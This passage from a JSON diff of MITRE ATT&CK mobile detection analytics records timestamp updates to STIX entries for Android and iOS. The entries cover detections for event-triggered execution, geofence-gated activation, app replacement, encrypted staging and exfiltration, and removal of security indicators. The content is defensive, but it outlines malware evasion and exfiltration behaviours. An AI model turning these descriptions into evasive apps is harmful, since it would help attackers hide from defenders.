+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Inspection",
+                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between app lifecycle event and network-side inspection failure or opaque TLS session"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Managed apps expected to use certificate or public-key pinning for legitimate purposes"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved endpoints expected for legitimate pinned sessions"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether the app is expected to perform network establishment only during user-driven workflows"
+                        },
+                        {
+                            "field": "InspectionFailureThreshold",
+                            "description": "Number of repeated TLS-inspection failures needed before escalating confidence"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-08 16:26:13.027000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--0d22c60c-fd0b-47f8-abe4-2d661a73c653",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0647#AN1727",
+                            "external_id": "AN1727"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1727",
+                    "description": "The defender correlates application registration for system event triggers (e.g., broadcast receivers, WorkManager, JobScheduler, SMS/BOOT events) with subsequent execution of application code immediately following the triggering event, without direct user interaction. Confidence increases when execution occurs in background or locked state, is tied to sensitive triggers (SMS received, boot completed, connectivity change), and produces follow-on file or network activity inconsistent with the application\u2019s expected role.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "System event occurs (e.g., SMS received, device boot completed, network state changed) acting as trigger event for execution phase"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between event trigger occurrence and execution behavior"
+                        },
+                        {
+                            "field": "SensitiveEventList",
+                            "description": "List of high-risk trigger events such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE, PACKAGE_ADDED"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Applications legitimately expected to use background scheduling or event-driven execution (e.g., messaging, system services)"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether execution should only occur during active user interaction for specific app categories"
+                        },
+                        {
+                            "field": "ExecutionDelayThreshold",
+                            "description": "Maximum allowed delay between event trigger and execution to still be considered causal"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound data volume after event-triggered execution to indicate meaningful activity"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-04-09 21:01:31.075000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9b4be141-9743-4113-a5f6-2d1a019b0eeb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0648#AN1728",
+                            "external_id": "AN1728"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1728",
+                    "description": "Correlates (1) acquisition of foreground or background location permission sufficient for continuous geolocation evaluation, (2) repeated location checks or registration of geofence monitoring in background or low-interaction states, and (3) transition into sensitive behavior only after the device enters, exits, or remains within a qualifying geographic region. The defender observes a causal chain where an application suppresses malicious or higher-risk behavior until a location-derived condition is satisfied, then initiates follow-on actions such as network communication, background processing, or protected resource access.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application remains dormant, low-activity, or background-resident across non-qualifying locations and transitions into active execution only after geographic condition is met"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between location evaluation, region transition, and guarded execution"
+                        },
+                        {
+                            "field": "RegionMatchThreshold",
+                            "description": "Defines proximity, radius, or duration within region required before subsequent activity is considered geographically gated"
+                        },
+                        {
+                            "field": "BackgroundLocationRequired",
+                            "description": "Whether suspiciousness increases when background location permission is present and activity occurs outside foreground use"
+                        },
+                        {
+                            "field": "DormancyThreshold",
+                            "description": "Amount of low-activity or dormant runtime before location-qualified activation"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Baseline of legitimate apps expected to use geofencing or conditional location-based features"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether execution should be considered higher fidelity only when it begins from background or without recent user interaction"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound traffic volume used to distinguish meaningful post-match activity from benign telemetry"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-13 19:15:22.491000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2f2ed160-9093-4b1f-b781-8660552bf1e5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0648#AN1729",
+                            "external_id": "AN1729"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1729",
+                    "description": "Correlates (1) application possession and use of location authorization sufficient for ongoing geographic evaluation, (2) repeated location or region-monitoring behavior with limited visible feature activation outside target area, and (3) abrupt onset of network communication, background execution, or feature activation only after a qualifying location context is reached. Because direct visibility into every geofence callback is often weaker on iOS, the defender relies more heavily on the combination of location authorization state, repeated location access, app state transition, and downstream behavior that begins after region alignment.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between location access, region qualification, and guarded activity"
+                        },
+                        {
+                            "field": "AuthorizationMode",
+                            "description": "Expected risk weighting for when-in-use versus always authorization and whether background behavior occurs under that mode"
+                        },
+                        {
+                            "field": "RegionMatchThreshold",
+                            "description": "Defines geospatial or dwell-time threshold used to infer region-based activation"
+                        },
+                        {
+                            "field": "DormancyThreshold",
+                            "description": "Duration of inactivity or suppressed behavior before location-qualified activation"
+                        },
+                        {
+                            "field": "ExpectedBackgroundModes",
+                            "description": "Baseline of apps legitimately using location-driven background execution or region monitoring"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Expected destinations for apps whose network activity legitimately depends on user location"
+                        },
+                        {
+                            "field": "UserInteractionThreshold",
+                            "description": "Acceptable recency of user interaction before post-location activation is considered suspicious"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-13 19:20:39.637000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--75c4eac4-c61c-4d02-acd9-ec8f5b6cfaff",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0649#AN1730",
+                            "external_id": "AN1730"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1730",
+                    "description": "The defender correlates anomalous application package replacement, update, or executable-content drift with subsequent execution under the trusted application's identity, especially when package metadata, signing lineage, install source, file integrity, or native/DEX component characteristics change without a corresponding trusted distribution path. The analytic prioritizes Android-observable control-plane effects: package install/update events, package hash or code-section drift, signer mismatch or lineage break, unexpected app process behavior after replacement, and optional near-term network or sensor activity inconsistent with the legitimate application's baseline.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed application package version, signer lineage, installer source, or app identity changes outside approved enterprise or store-mediated update workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Modified or newly replaced application begins execution or persists while recent_user_interaction=false or device_locked=true or launch context is inconsistent with expected user-driven update flow"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between package replacement, code drift, first launch, and follow-on behavior"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Applications legitimately expected to update frequently or use staged package delivery"
+                        },
+                        {
+                            "field": "ApprovedInstallerSources",
+                            "description": "Expected install or update sources such as managed store, Google Play, or enterprise MDM"
+                        },
+                        {
+                            "field": "AllowedSignerLineage",
+                            "description": "Approved signing certificates, rotation chains, and version lineage for managed apps"
+                        },
+                        {
+                            "field": "AllowedPackagePaths",
+                            "description": "Expected package cache, installer, and app storage locations involved in legitimate updates"
+                        },
+                        {
+                            "field": "IntegrityDriftThreshold",
+                            "description": "Degree of executable-content or metadata change tolerated before alerting"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether package replacement and first launch should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Minimum outbound volume after first execution of replaced app to treat post-compromise communication as meaningful"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-04-09 16:22:36.406000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d5926b94-833c-4b29-b611-059f72fcda84",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0650#AN1731",
+                            "external_id": "AN1731"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1731",
+                    "description": "An application performs repeated symmetric cryptographic operations (e.g., AES/RC4) on collected or staged data using locally accessible or reusable keys, followed by structured outbound communication. Detection correlates symmetric crypto API invocation + key reuse patterns + data staging + background execution context + network transmission, especially when inconsistent with expected application functionality.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Crypto + data staging occurs while app_state=background OR device_locked=true OR no recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App not in enterprise-approved list performing network + crypto behavior inconsistent with declared functionality"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Time correlation between symmetric encryption operations and outbound communication"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for detecting encrypted payloads based on entropy scoring"
+                        },
+                        {
+                            "field": "KeyReuseThreshold",
+                            "description": "Number of repeated uses of the same symmetric key within a defined interval"
+                        },
+                        {
+                            "field": "AllowedCryptoApps",
+                            "description": "Apps expected to use symmetric encryption (e.g., messaging, VPN)"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether encryption activity should occur only during active user interaction"
+                        },
+                        {
+                            "field": "BeaconIntervalVariance",
+                            "description": "Expected jitter vs periodic encrypted communication"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-01 16:01:38.627000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6c776c7a-0e2f-4963-9485-aa90149ae68e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0650#AN1732",
+                            "external_id": "AN1732"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1732",
+                    "description": "Indirect evidence of symmetric cryptographic channel usage inferred through repeated structured encrypted network transmissions and background processing patterns, where direct observation of symmetric crypto operations is limited. Detection correlates application background execution + consistent encrypted payload patterns + app entitlement posture to identify misuse of symmetric encryption for command and control.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between background execution and network transmission"
+                        },
+                        {
+                            "field": "EntropyThreshold",
+                            "description": "Threshold for detecting encrypted payloads"
+                        },
+                        {
+                            "field": "BeaconIntervalVariance",
+                            "description": "Tolerance for periodic encrypted communication"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps expected to exhibit encrypted communication patterns"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-04-01 16:04:16.642000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--50e52979-5f21-4a02-99f3-fc1858b73369",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0651#AN1733",
+                            "external_id": "AN1733"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1733",
+                    "description": "Detects indirect evidence of host-side indicator removal by correlating (1) local artifact creation or compromise-state-relevant activity, (2) later disappearance, alteration, or reporting loss for those artifacts or state indicators, and (3) continued application or device activity under reduced visibility. Because iOS provides weaker direct visibility into some Android-style artifact and jailbreak-indicator manipulation patterns, the defender relies more on app-private artifact lifecycle changes, managed posture shifts, and continued runtime or network activity after expected evidence disappears.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "Application Vetting",
+                            "channel": "None"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "User Interface",
+                            "channel": "None"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between artifact disappearance, posture change, and continued activity"
+                        },
+                        {
+                            "field": "ArtifactTypeSet",
+                            "description": "Host artifacts and state indicators monitored for suspicious removal, alteration, or disappearance"
+                        },
+                        {
+                            "field": "ExpectedTelemetrySources",
+                            "description": "Baseline sources expected to continue exposing artifact presence or compromise-relevant state"
+                        },
+                        {
+                            "field": "TelemetryGapThreshold",
+                            "description": "Threshold defining abnormal loss of artifact visibility or managed-state continuity"
+                        },
+                        {
+                            "field": "ExpectedManagementChanges",
+                            "description": "Known legitimate posture or inventory changes that may remove or update artifacts"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to confirm meaningful continued activity after indicator removal"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:30:22.993000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--4773bc29-5272-45d5-92bd-b24a34b16df6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0651#AN1734",
+                            "external_id": "AN1734"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1734",
+                    "description": "Correlates (1) application activity that creates, modifies, or accesses local artifacts relevant to detection or device compromise state, (2) subsequent deletion, alteration, renaming, relocation, or visibility suppression of those artifacts, including files, application presence, media, or root-compromise indicators, and (3) continued application execution, reduced telemetry quality, or outbound activity after the artifact state changes. The defender observes a causal chain where host-side evidence is first manipulated and expected visibility or reporting degrades while the initiating application remains active.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between artifact change, visibility degradation, and continued execution or network activity"
+                        },
+                        {
+                            "field": "ArtifactTypeSet",
+                            "description": "Types of host artifacts monitored for suspicious removal or alteration, such as files, installed-app presence, hidden media, or compromise markers"
+                        },
+                        {
+                            "field": "ExpectedTelemetrySources",
+                            "description": "Baseline sources expected to continue reflecting artifacts or compromise state"
+                        },
+                        {
+                            "field": "TelemetryGapThreshold",
+                            "description": "Threshold defining abnormal loss of artifact visibility or reporting continuity"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Legitimate apps expected to delete or alter artifacts as part of normal lifecycle or cleanup behavior"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to confirm meaningful activity after indicator removal"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-04-24 20:30:21.803000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--31d95dc7-aec7-47a2-bbb4-8b20ca3bc184",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0653#AN1737",
+                            "external_id": "AN1737"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1737",
+                    "description": "Correlates (1) application access to device- or environment-specific attributes used to validate target conditions, (2) suppression of sensitive behavior until those attributes match an expected value, and (3) immediate transition into protected actions such as sensor use, file access, or network communication only after the condition is satisfied. The defender observes a causal chain where an app repeatedly evaluates device state or environment context and withholds execution until a target-specific match occurs.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application holds permissions enabling environment validation (e.g., location, phone state, nearby device/network context) and subsequently delays protected activity until qualifying values are present"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between environment checks and subsequent guarded execution"
+                        },
+                        {
+                            "field": "TargetAttributeSet",
+                            "description": "Environment attributes treated as likely guardrail inputs, such as locale, geolocation, carrier, Wi-Fi identity, device model, or lock state"
+                        },
+                        {
+                            "field": "DormancyThreshold",
+                            "description": "Amount of suppressed or low-activity runtime before sensitive behavior begins"
+                        },
